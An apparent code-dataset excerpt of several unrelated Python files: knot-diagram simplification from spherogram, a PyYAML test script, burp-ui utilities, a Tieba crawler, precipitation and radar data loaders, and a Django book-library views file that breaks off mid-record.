overcrossingstrand:\n startcep = overcross[0]\n length = overcross[1]\n G = link.dual_graph()\n\n #finding all crosses traversed by the overcrossing, accounting for possible self-intersection\n endpoint = startcep.next()\n crossingset = set([endpoint.crossing])\n for i in range(1,length):\n endpoint = endpoint.next()\n crossingset.add(endpoint.crossing)\n endpoint = endpoint.next()\n\n #creating list of edges of the dual graph corresponding to segments of the strand overcross\n crossgraph = nx.Graph()\n edgescrossed = []\n s = startcep\n\n\n for i in range(length+1):\n edge = (s.rotate(2),s.next())\n listOfEdges = list(G.edges)\n for j in range(len(listOfEdges)):\n edgereverse = (edge[1],edge[0])\n if(listOfEdges[j].interface == edge or listOfEdges[j].interface == edgereverse ):\n edge = listOfEdges[j]\n break\n\n edgescrossed.append(edge)\n s = s.next()\n\n\n\n #create a networkx graph with these edges, and find the connected components\n for i in range(len(edgescrossed)):\n crossgraph.add_edge(edgescrossed[i][0],edgescrossed[i][1])\n\n\n components = list(nx.connected_components(crossgraph))\n\n #collapse the connected components in original dual graph\n Gx = G.to_networkx()\n for i in range(len(components)):\n merge_vertices(Gx,components[i])\n Gx_nodes = Gx.nodes()\n\n #find shortest path between start and end points\n source = None\n dest = None\n\n for i in range(len(Gx)):\n for j in range(len((Gx_nodes[i]))):\n\n if Gx_nodes[i][j] == edgescrossed[0][0]:\n\n source = Gx_nodes[i]\n\n if Gx_nodes[i][j] == edgescrossed[-1][0]:\n\n dest = Gx_nodes[i]\n path = nx.shortest_path(Gx,source,dest)\n\n crossingsremoved = length - (len(path) - 1)\n\n if crossingsremoved == 0:\n continue\n\n #force all elements of path to be represented as tuples (to account for single elements)\n for i in range(len(path)):\n if(not type(path[i]) == tuple):\n path[i] = path[i],\n\n #creating a new list of crossings from which to rebuild the link, remove old overcross\n newcrossings = list(link.crossings)\n for i in newcrossings: #remove old orientations\n i.sign = 0\n i.directions.clear()\n toremove = startcep.next()\n for i in range(len(crossingset)):\n loose1 = toremove.rotate(1).opposite()\n loose2 = toremove.rotate(3).opposite()\n\n lc1, lc1ep = loose1.crossing, loose1.entry_point\n lc2, lc2ep = loose2.crossing, loose2.entry_point\n\n while lc1 not in newcrossings:\n lc1, lc1ep = lc1.rotate(2).opposite().crossing, lc1.rotate(2).opposite().entry_point\n while lc2 not in newcrossings:\n lc2, lc2ep = lc2.rotate(2).opposite().crossing, lc2.rotate(2).opposite().entry_point\n lc1[lc1ep] = lc2[lc2ep]\n newcrossings.remove(toremove.crossing)\n toremove = toremove.next()\n\n\n looseend = startcep.rotate(2)\n\n #find new sequence of overcrossings to create\n for i in range(len(path)-1):\n nextedge = None\n label = 'new%d' % i\n crossingtoadd = Crossing(label)\n first = None\n for j in range(len(path[i])):\n found = False\n idict = G.incidence_dict[path[i][j]]\n for l in range(len(idict)):\n if(idict[l][0] != path[i][j]):\n totest = idict[l][0]\n else:\n totest = idict[l][1]\n\n if(totest in path[i+1]):\n found = True\n nextedge = idict[l]\n first = path[i][j]\n\n\n for i in first:\n if i == nextedge.interface[0] or i == nextedge.interface[1]:\n lec, lecep = looseend.crossing, looseend.entry_point\n crossingtoadd[1] = lec[lecep]\n ic,icep = i.crossing,i.entry_point\n ico,icoep = i.opposite().crossing, i.opposite().entry_point\n while ic not in newcrossings:\n temp = ic.crossing_strands()[icep]\n ic,icep = temp.rotate(2).opposite().crossing,temp.rotate(2).opposite().entry_point\n while ico not in newcrossings:\n temp = ico.crossing_strands()[icoep]\n ico,icoep = temp.rotate(2).opposite().crossing,temp.rotate(2).opposite().entry_point\n\n crossingtoadd[2] = ic[icep]\n crossingtoadd[0] = ico[icoep]\n\n\n\n looseend = crossingtoadd.crossing_strands()[3]\n newcrossings.append(crossingtoadd)\n\n lec, lecep = looseend.crossing, looseend.entry_point\n ec, ecep = endpoint.crossing, endpoint.entry_point\n ec[ecep] = lec[lecep]\n return Link(newcrossings), crossingsremoved\n\n return link, 0\n\ndef merge_vertices(graph,vertices):\n \"\"\"\n Merges list of vertices of networkx graph and throws together all\n edges of all the merged vertices.\n \"\"\"\n\n v = tuple(vertices)\n graph.add_node(v)\n for i in range(len(v)):\n edgelist = graph.edges(v[i])\n for j in range(len(edgelist)):\n graph.add_edge(v,edgelist[j][0])\n graph.add_edge(v,edgelist[j][1])\n graph.remove_node(v[i])\n return\n\n\ndef random_reverse_type_I(link,label):\n \"\"\"\n Randomly adds a loop in a strand, adding one crossing with given label\n \"\"\"\n \n cs1 = random.choice(link.crossing_strands())\n D = Crossing(label)\n link.crossings.append(D)\n\n cs2 = cs1.opposite()\n D[2] = D[3]\n cs1ec, cs1cep = cs1.crossing, cs1.entry_point\n D[0] = cs1ec[cs1cep]\n cs2ec, cs2cep = cs2.crossing, cs2.entry_point\n D[1] = cs2ec[cs2cep]\n \n D.rotate(random.randint(0,1)) #choose whether over or under crossing\n\ndef random_reverse_type_II(link, label1, label2):\n \"\"\"\n Randomly crosses two strands, adding two crossings, with labels label1 and label2\n \"\"\"\n\n G = DualGraphOfFaces(link)\n while True:\n face = random.choice(list(G.vertices))\n if len(face)>1:\n break\n c, d = random.sample(face,2)\n new1, new2 = Crossing(label1), Crossing(label2) \n c_cross, c_ep = c.crossing, c.entry_point\n cop_cross, cop_ep = c.opposite().crossing, c.opposite().entry_point\n d_cross, d_ep = d.crossing, d.entry_point\n dop_cross, dop_ep = d.opposite().crossing, d.opposite().entry_point\n new1[2], new1[3] = new2[0], new2[3]\n new1[0], new1[1] = dop_cross[dop_ep], c_cross[c_ep]\n new2[1], new2[2] = cop_cross[cop_ep], d_cross[d_ep]\n\n link.crossings.append(new1)\n link.crossings.append(new2)\n\ndef random_reverse_move(link,t,n):\n \"\"\"\n Performs a crossing increasing move of type t, where t is 1, 2, or 3\n n is for labeling the new crossings\n \"\"\"\n if t == 1:\n random_reverse_type_I(link,'new'+str(n))\n elif t == 2:\n random_reverse_type_II(link,'new'+str(n),'new'+str(n+1))\n else:\n poss_moves = possible_type_III_moves(link)\n if len(poss_moves) != 0:\n reidemeister_III(link, random.choice(poss_moves))\n\n\ndef backtrack(link, num_steps = 10):\n \"\"\"\n Randomly perform a series of Reidemeister moves which increase or preserve the\n number of crossings of a link diagram, with the number of such moves num_steps\n Use the method backtrack in the Link class.\n \"\"\"\n if len(link) == 0:\n return link\n\n n = 0\n for i in range(num_steps):\n t = random.randint(1,3)\n n += t%3\n\n random_reverse_move(link,t,n)\n \n clear_orientations(link)\n\n L = Link(link.crossings)\n link = L\n clear_orientations(link)\n relabel_crossings(link)\n return Link(link.crossings)\n \n\ndef clear_orientations(link):\n \"\"\"\n Resets the orientations on the crossings of a link to default values\n \"\"\"\n link.link_components = None\n for i in link.crossings:\n i.sign = 0\n i.directions.clear()\n\ndef relabel_crossings(link):\n \"\"\"\n Relabel the crossings as integers\n \"\"\"\n for i,cr in enumerate(link.crossings):\n cr.label = str(i)\n\n \ndef pickup_simplify(link, type_III=0):\n \"\"\"\n Performs optimize_overcrossings on a diagram, flips, and performs the\n same process on the other side of the diagram, simplifying in between\n until the process stabilizes. The boolean full_simplify indicates \n whether or not to perform a simplification that includes Reidemeister III\n type moves.\n \"\"\"\n L = link\n init_num_crossings = len(L.crossings)\n stabilized = init_num_crossings == 0\n\n def intermediate_simplify(a_link):\n if type_III:\n simplify_via_level_type_III(a_link, type_III)\n else:\n basic_simplify(a_link)\n\n intermediate_simplify(link)\n\n while not stabilized:\n L, overcrossingsremoved = L.optimize_overcrossings()\n intermediate_simplify(L)\n\n if len(L.crossings) == 0:\n break\n mirror = L.mirror()\n mirror, undercrossingsremoved = mirror.optimize_overcrossings()\n L = mirror.mirror()\n intermediate_simplify(L)\n stabilized = ((overcrossingsremoved == 0) and (undercrossingsremoved == 0)) or (len(L.crossings) == 0)\n\n link.crossings = L.crossings\n link.labels = L.labels\n link.link_components = L.link_components\n link.name = L.name\n return len(L.crossings) != init_num_crossings\n\n\n \n", "sub_path": "venv/Lib/site-packages/spherogram-1.4.1-py2.7-win32.egg/spherogram/links/simplify.py", "file_name": "simplify.py", "file_ext": "py", "file_size_in_byte": 18365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "links.Strand", "line_number": 139, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 172, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 272, "usage_type": "call"}, {"api_name": "networkx.connected_components", "line_number": 296, "usage_type": "call"}, {"api_name": "networkx.shortest_path", "line_number": 318, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 358, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 399, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 425, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 426, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 436, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 445, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 448, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 449, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 473, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 487, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 494, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 498, "usage_type": "call"}]} +{"seq_id": "490696867", "text": "# #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/1 10:04 上午\n# @Author : 百变金刚\n# @Content : test for yaml\n\n# 1. 大小写敏感\n# 2. 使用缩进表示层级关系\n# 3. 缩进时不允许使用Tab,只允许使用空格\n# 4. 缩进的空格数目不重要,只要相同层级的元素左对齐即可\n# 5. # 表示注释,从它开始到行尾都被忽略\n\nimport yaml\n\ndef traversePrint(iter, sp=0):\n # 错误方案,'asdf', 'a'都是可迭代的\n # if hasattr(iter, '__iter__'):\n # for i in iter:\n # traversePrint(i, sp+2)\n\n # 次级耦合方案\n if isinstance(iter, dict):\n for item in iter.items():\n if isinstance(item[1], dict):\n print('{}{}'.format(' '*sp, item[0],))\n traversePrint(item[1], sp+2)\n else:\n print('{}{}: {}'.format(' '*sp, item[0], item[1]))\n else:\n print('{}{}'.format(' '*sp, iter))\n\ndef testRead1():\n with open('conf/test.yml') as f:\n # conf = yaml.safe_load(f) # 此处若使用load()将会报警告,被认为是不安全的\n # conf = yaml.load(f, Loader=yaml.SafeLoader) # 一种方案(https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n conf = yaml.safe_load(f)\n # print(conf)\n traversePrint(conf)\n\ndef testRead2():\n # --- 对yaml分块\n with open('conf/obj.yml') as f:\n # conf = yaml.safe_load(f) # 报错,---把yml文件分成了不止一个流对象,load只能接收一个流对象\n conf = yaml.load_all(f, Loader=yaml.SafeLoader)\n # 此处若使用load()将会报警告,被认为是不安全的\n\n # 此时conf是一个生成器\n # 这段操作不能放在f的范围之外,因为生成器实时取\n for ci in conf:\n print(ci)\n\ndef testWrite1():\n import yaml\n aproject = {'name': 'Silenthand Olleander',\n 'race': 'Human',\n 'traits': ['ONE_HAND', 'ONE_EYE']\n }\n aproject = {'main.common-arch.thumbnail-service-rs': ['/bfs/{}'.format('sss')]}\n # 将python对象封装为yaml对象\n print(yaml.dump(aproject,))\n '''\n name: Silenthand Olleander\n race: Human\n traits:\n - ONE_HAND\n - ONE_EYE\n '''\n # 写入文件\n with open('conf/writeconf.yml', 'w') as f:\n yaml.dump(aproject, f)\n\ndef testWriteAll():\n # 分段(---)写yml\n # 把几个对象分装成list写yml\n obj1 = {\"name\": \"James\", \"age\": 20}\n obj2 = [\"Lily\", 19]\n\n with open('writeall.yml', 'w') as f:\n yaml.dump_all([obj1, obj2], f)\n\n\n\nif __name__ == '__main__':\n # testWriteAll()\n # testWrite1()\n # testRead2()\n testRead1()\n", "sub_path": "tools/configfile/Yamlyl/t01test.py", "file_name": "t01test.py", "file_ext": "py", "file_size_in_byte": 2718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.safe_load", "line_number": 36, "usage_type": "call"}, {"api_name": "yaml.load_all", "line_number": 44, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 44, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 70, "usage_type": "call"}, {"api_name": "yaml.dump_all", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "234892419", "text": "# -*- coding: utf8 -*-\n\n\"\"\"\nThe following code is used to convert bytes to be human readable.\nIt was found on the Internet...\n\"\"\"\n\nimport math\nimport string\nimport sys\nimport inspect\nimport zipfile\nimport tarfile\nimport logging\n\nif sys.version_info >= (3, 0):\n long = int\n\n\nclass human_readable(long):\n \"\"\"\n define a human_readable class to allow custom formatting\n format specifiers supported :\n em : formats the size as bits in IEC format i.e. 1024 bits (128 bytes) = 1Kib\n eM : formats the size as Bytes in IEC format i.e. 1024 bytes = 1KiB\n sm : formats the size as bits in SI format i.e. 1000 bits = 1kb\n sM : formats the size as bytes in SI format i.e. 1000 bytes = 1KB\n cm : format the size as bit in the common format i.e. 1024 bits (128 bytes) = 1Kb\n cM : format the size as bytes in the common format i.e. 1024 bytes = 1KB\n\n code from: http://code.activestate.com/recipes/578323-human-readable-filememory-sizes-v2/\n \"\"\"\n def __format__(self, fmt):\n # is it an empty format or not a special format for the size class\n if fmt == \"\" or fmt[-2:].lower() not in [\"em\", \"sm\", \"cm\"]:\n if fmt[-1].lower() in ['b', 'c', 'd', 'o', 'x', 'n', 'e', 'f', 'g', '%']:\n # Numeric format.\n return long(self).__format__(fmt)\n else:\n return str(self).__format__(fmt)\n\n # work out the scale, suffix and base\n factor, suffix = (8, \"b\") if fmt[-1] in string.lowercase else (1, \"B\")\n base = 1024 if fmt[-2] in [\"e\", \"c\"] else 1000\n\n # Add the i for the IEC format\n suffix = \"i\" + suffix if fmt[-2] == \"e\" else suffix\n\n mult = [\"\", \"K\", \"M\", \"G\", \"T\", \"P\"]\n\n val = float(self) * factor\n i = 0 if val < 1 else int(math.log(val, base)) + 1\n v = val / math.pow(base, i)\n v, i = (v, i) if v > 0.5 else (v * base, i - 1)\n\n # Identify if there is a width and extract it\n width = \"\" if fmt.find(\".\") == -1 else fmt[:fmt.index(\".\")]\n precis = fmt[:-2] if width == \"\" else fmt[fmt.index(\".\"):-2]\n\n # do the precision bit first, so width/alignment works with the suffix\n if float(self) == 0:\n return \"{0:{1}f}\".format(v, precis)\n t = (\"{0:{1}f}\" + mult[i] + suffix).format(v, precis)\n\n return \"{0:{1}}\".format(t, width) if width != \"\" else t\n\n\ndef currentframe():\n \"\"\"Return the frame object for the caller's stack frame.\"\"\"\n try:\n raise Exception\n except:\n return sys.exc_info()[2].tb_frame.f_back\n\n\nclass BUIlogging(object):\n def _logger(self, level, *args):\n if self.logger:\n \"\"\"\n Try to guess where was call the function\n \"\"\"\n cf = currentframe()\n (frame, filename, line_number, function_name, lines, index) = inspect.getouterframes(cf)[1]\n if cf is not None:\n cf = cf.f_back\n \"\"\"\n Ugly hack to reformat the message\n \"\"\"\n ar = list(args)\n if isinstance(ar[0], str):\n ar[0] = filename + ':' + str(cf.f_lineno) + ' => ' + ar[0]\n else:\n ar = [filename + ':' + str(cf.f_lineno) + ' => {0}'.format(ar)]\n args = tuple(ar)\n self.logger.log(logging.getLevelName(level.upper()), *args)\n\n\nclass BUIcompress():\n def __init__(self, name, archive):\n self.name = name\n self.archive = archive\n\n def __enter__(self):\n self.arch = None\n if self.archive == 'zip':\n self.arch = zipfile.ZipFile(self.name, mode='w', compression=zipfile.ZIP_DEFLATED)\n elif self.archive == 'tar.gz':\n self.arch = tarfile.open(self.name, 'w:gz')\n elif self.archive == 'tar.bz2':\n self.arch = tarfile.open(self.name, 'w:bz2')\n return self\n\n def __exit__(self, type, value, traceback):\n self.arch.close()\n\n def append(self, path, arcname):\n if self.archive == 'zip':\n self.arch.write(path, arcname)\n elif self.archive in ['tar.gz', 'tar.bz2']:\n self.arch.add(path, arcname=arcname, recursive=False)\n", "sub_path": "burpui/misc/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 4216, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.version_info", "line_number": 16, "usage_type": "attribute"}, {"api_name": "string.lowercase", "line_number": 43, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 52, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 73, "usage_type": "call"}, {"api_name": "inspect.getouterframes", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 95, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 106, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 108, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "143430261", "text": "from requester import Requester\nfrom common import config_reader, config_intervaltime\nimport post\nimport time\nimport spamword\nimport rediscache\n\n\nclass TiebaCrawler(Requester):\n \"\"\" Post crawler , gather information of posts in given bar\n can't get image submmited in post\n \"\"\"\n\n def __init__(self, tieba_name=\"steam\", cookie=None):\n Requester.__init__(self, tieba_name, cookie)\n\n def __avaiable_check(self):\n # response = self.session_worker\n pass\n\n def get_posts(self):\n soup = self.get_content(self.tieba_base)\n\n post_a = self.__get_posts_a(soup)\n\n url_list = [self.url_base + tag.get('href') for tag in post_a]\n\n post_content_list = self.__get_content_list(url_list)\n post_list = [post.Post(url, soup) for url, soup in zip(url_list, post_content_list)]\n\n return post_list\n\n @rediscache.postcache\n def __get_content_list(self, url_list):\n content_list = []\n\n for url in url_list:\n content_list.append(self.get_content(url))\n\n time.sleep(config_intervaltime())\n\n return content_list\n\n def __get_posts_a(self, soup):\n posts_list = soup.findAll('div', {'class': 'i'})\n posts_list = [tag.find('a') for tag in posts_list if not tag.find('span', {'class': 'light'})]\n return posts_list\n\n\nif __name__ == \"__main__\":\n cookie, _ = config_reader()\n tieba_worker = TiebaCrawler(cookie=cookie, tieba_name='dota2提问')\n posts = tieba_worker.get_posts()\n print(len(list(map(str, posts))))\n posts = tieba_worker.get_posts()\n print(len(list(map(str, posts))))\n # print(list(map(str, posts[0].reply_list)))\n", "sub_path": "crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 1675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requester.Requester", "line_number": 9, "usage_type": "name"}, {"api_name": "requester.Requester.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "requester.Requester", "line_number": 15, "usage_type": "name"}, {"api_name": "post.Post", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "common.config_intervaltime", "line_number": 40, "usage_type": "call"}, {"api_name": "rediscache.postcache", "line_number": 33, "usage_type": "attribute"}, {"api_name": "common.config_reader", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "279815866", "text": "import os\nimport numpy as np\nimport pandas as pd\nimport netCDF4 as nc\n\nhomedir = os.path.expanduser('~')\naa_dir = homedir + '/data/prcp/aa_gauges'\nwu_dir = homedir + '/data/prcp/wu_station'\nvehicle_dir = homedir + '/data/vehicle_v2'\nradar_dir = homedir + '/data/nexrad3/nc/inst_prcp_rate'\n\ndef read_ann_arbor_gages(aa_dir=os.path.join(homedir, aa_dir)):\n \"\"\"\n Read ann arbor gages into a single table.\n\n Parameters:\n aa_dir: The directory containing the gage data\n\n Returns:\n aa_df: A single table containing all ann arbor city gage data\n aa_locs: A table containing lat and lon info for each gage\n\n \"\"\"\n # Initialize empty dict to hold data\n d = {}\n \n # Loop through directory\n for fn in os.listdir(aa_dir):\n # Read files\n d[fn[0]] = pd.read_csv(aa_dir + '/' + fn)\n # Rename columns\n d[fn[0]].rename(columns={'Reading Date' : 'date',\n 'Rainfall (in.)' : 'prcp'},\n inplace=True)\n # Convert time column to datetime index\n d[fn[0]]['date'] = pd.to_datetime(d[fn[0]]['date'])\n d[fn[0]].set_index('date', inplace=True)\n d[fn[0]] = d[fn[0]]['prcp']\n\n # Join gages into a single dataframe\n aa_df = pd.concat([i for i in d.values()], axis=1)\n aa_df.columns = d.keys()\n # Put dates in UTC\n aa_df = aa_df.tz_localize('EST').tz_convert('UTC')\n del d\n\n aa_locs = {'C' : (42.294157, -83.754970),\n 'J' : (42.284517, -83.795354),\n 'S' : (42.253200, -83.733444),\n 'N' : (42.294157, -83.710069),\n 'B' : (42.306814, -83.754970)}\n\n aa_locs = pd.DataFrame.from_dict(aa_locs, orient='index').rename(columns={0:'lat', 1:'lon'})\n return aa_df, aa_locs\n\n\ndef read_wu_gages(wu_dir=os.path.join(homedir, wu_dir), var='HourlyPrecipIn', var_accum='dailyrainin'):\n \"\"\"\n Read Weather Underground gages into a single table.\n\n Parameters:\n wu_dir: The directory containing the gage data\n\n Returns:\n wu_df: A single table containing all weather underground gage data\n wu_locs: A table containing lat and lon info for each gage\n\n \"\"\"\n\n # Initialize empty dict to hold data\n wu_d = {}\n\n # Loop through directory\n for fn in os.listdir(wu_dir):\n station_id = fn\n if fn != 'station_locs':\n if fn in ['KMIANNAR33', 'KMISALIN8', 'KMIANNAR47', 'KMIANNAR49']:\n # Read files\n wu = pd.read_csv(os.path.join(wu_dir, fn), index_col=0).set_index('DateUTC')[var]\n wu.index = pd.to_datetime(pd.Series(wu.index)).values\n wu = wu.tz_localize('UTC')\n wu.index.name = 'time'\n wu.name = station_id\n wu_d[station_id] = wu\n else:\n df = pd.read_csv(os.path.join(wu_dir, fn), index_col=0)\n df['Time'] = pd.to_datetime(df['Time'])\n df['DateUTC'] = pd.to_datetime(df['DateUTC'])\n df.set_index('Time', inplace=True, drop=False)\n\n d = df.groupby(pd.TimeGrouper('d', closed='right'))[var_accum].diff()\n t = df.groupby(pd.TimeGrouper('d', closed='right'))['Time'].diff()\n d = d * (3600000000000 / t.astype(int))\n\n d[d < 0] = df.loc[d[d < 0].index, var_accum]\n d.name = fn\n wu = pd.concat([d, df['DateUTC']], axis=1).set_index('DateUTC')\n wu = wu.tz_localize('UTC')\n wu.index.name = 'time'\n wu_d[station_id] = wu\n\n # Concatenate separate gages\n wu_df = pd.concat([wu_d[i] for i in wu_d], axis=1)\n # Remove invalid entries\n wu_df[wu_df < 0] = np.nan\n # Read gage location file\n wu_locs = pd.read_csv(wu_dir + '/' + 'station_locs', index_col=0)\n return wu_df, wu_locs\n\ndef read_vehicle_data(veh_file):\n \"\"\"\n Read vehicle data file for a single day\n\n Parameters:\n veh_file: Path of the vehicle data as a string.\n\n Returns:\n veh: A dataframe of the vehicle data for a given day.\n \"\"\"\n\n # Read vehicle file\n veh = pd.read_csv(veh_file, header=None)\n # Fix column headings\n veh.columns = ['Device', 'Trip', 'Latitude', 'Longitude', 'Time', 'Wiper', 'GPS_Speed']\n # Convert time to datetime\n veh['Time'] = pd.to_datetime(veh['Time'])\n veh = veh.set_index('Time').tz_localize('UTC')\n return veh\n\ndef radar_to_panel(radar_path, var_name=None, dim_map={}, time_unit='s'):\n \"\"\"\n Reads netcdf file and converts to a pandas Panel with sorted axes\n\n Parameters:\n -----------\n radar_path: Path to netCDF dataset\n var_name: Output variable name\n\n Returns:\n --------\n 3-dimensional pandas Panel.\n \"\"\"\n with nc.Dataset(radar_path, 'r') as d:\n dims = tuple(d.dimensions.keys())\n if dim_map:\n dims = tuple([dim_map[dim] for dim in dims])\n if not var_name:\n var_name = tuple(d.variables.keys())[0]\n\n p = pd.Panel(d.variables[var_name][:,:,:], items=d.variables[dims[0]][:], major_axis=d.variables[dims[1]][:], minor_axis=d.variables[dims[2]][:])\n p.items.name, p.major_axis.name, p.minor_axis.name = dims\n p.items = pd.to_datetime(p.items, unit=time_unit)\n p = p.sort_index(0).sort_index(1).sort_index(2)\n return p\n", "sub_path": "notebooks/read_data.py", "file_name": "read_data.py", "file_ext": "py", "file_size_in_byte": 5288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.expanduser", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.TimeGrouper", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.TimeGrouper", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 126, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Panel", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "178255606", "text": "from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Book, Auteur, Genre, Edition\nfrom .form import UploadFileForm, SearchBookForm\nimport csv, io\nimport requests\n\n# Create your views here.\n\ndef index(request):\n book_list = Book.objects.all()\n context = {'book_list': book_list}\n return render(request, 'biblio/index.html', context)\n\ndef detail(request, book_id):\n book = get_object_or_404(Book, pk=book_id)\n return render(request, 'biblio/detail.html', {'book':book})\n\ndef authors(request):\n authors = Auteur.objects.all()\n return render(request, 'biblio/authors.html', {'authors':authors})\n\ndef author_detail(request,id):\n author = get_object_or_404(Auteur, pk=id)\n return render(request, 'biblio/author_detail.html', {'author':author})\n\ndef genres(request):\n genres = Genre.objects.all()\n return render(request, 'biblio/genres.html', {'genres':genres})\n\ndef genre_detail(request,id):\n genre = get_object_or_404(Genre, pk=id)\n return render(request, 'biblio/genre_detail.html', {'genre':genre})\n\ndef editions(request):\n editions = Edition.objects.all()\n return render(request, 'biblio/editions.html', {'editions':editions})\n\ndef edition_detail(request,id):\n edition = get_object_or_404(Edition, pk=id)\n return render(request, 'biblio/edition_detail.html', {'edition':edition})\n\ndef imports(request):\n if request.method == 'POST':\n file = request.POST\n return render(request, 'biblio/imports.html', {'imports':imports} )\n\n@login_required(login_url=\"/admin\")\ndef upload_file(request):\n\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n\n if form.is_valid():\n\n csv_file = request.FILES['file']\n data_set = csv_file.read().decode('UTF-8')\n io_string = io.StringIO(data_set)\n next(io_string)\n\n books_list= []\n for row in csv.reader(io_string, delimiter=';', quotechar='\"'):\n \n edition = Edition.objects.create(nom='Gallimard')\n genre = Genre.objects.create(nom=row[5])\n auteurs = Auteur.objects.create(nom=row[3],prenom=\"John\")\n\n book = Book.objects.create(nom=row[0],resume=row[1],ISBN=row[2],edition=edition,image_url=row[6])\n if book:\n book.genres.add(genre)\n book.auteurs.add(auteurs)\n \n books_list.append(book)\n\n return render(request, \"biblio/csv.html\", {\"result\": True, 'books': books_list})\n else:\n form = UploadFileForm()\n return render(request, 'biblio/csv2.html', {'form': form})\n \n\ndef api_search(request):\n\n url = 'https://www.googleapis.com/books/v1/volumes?'\n\n if request.method == 'POST':\n form = SearchBookForm(request.POST)\n\n if form.is_valid():\n result = form.cleaned_data['title']\n params = dict(q=result)\n\n resp = requests.get(url=url, params=params)\n data = resp.json()\n # book_data = data['items'][0]['volumeInfo']\n # title = book_data['title']\n # authors = \n return render(request, 'biblio/api_search.html', {'form':form, 'data':data})\n\n else:\n form = SearchBookForm()\n return render(request, 'biblio/api_search.html', {'form': form})\n\n ", "sub_path": "biblio/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models.Book.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 12, "usage_type": "name"}, {"api_name": 